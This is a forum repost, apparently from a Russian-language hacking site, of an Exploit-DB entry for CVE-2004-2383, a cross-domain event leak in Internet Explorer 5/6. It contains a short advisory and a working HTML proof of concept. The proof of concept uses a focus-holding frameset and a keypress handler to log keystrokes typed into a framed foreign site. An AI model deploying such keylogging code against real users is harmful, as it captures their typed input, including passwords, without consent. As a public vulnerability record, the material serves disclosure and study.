Exploit Microsoft Internet Explorer 5/6 - Cross-Domain Event Leakage

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
23766
Проверка EDB
  1. Пройдено
Автор
IDEFENSE
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2004-2383
Дата публикации
2004-02-27
HTML:
source: https://www.securityfocus.com/bid/9761/info

Microsoft Internet Explorer is reported to be prone to an issue that may leak sensitive information across foreign domains.

This issue could permit framesets in different domains to leak various events, including keyboard events. This could effectively permit a hostile web page to capture keystrokes from a foreign domain. 

<html>
<head><title>IE Cross Frame Scripting Restriction Bypass Example</title>
<script>
var keylog='';
document.onkeypress = function () {
k = window.event.keyCode;
window.status = keylog += String.fromCharCode(k) + '[' + k +']';
}
</script>
</head>
<frameset onLoad="this.focus();" onBlur="this.focus();" cols="100%,*">
<frame src="http://www.example.com" scrolling="auto">
</frameset>
</html>
 
Источник
www.exploit-db.com

Похожие темы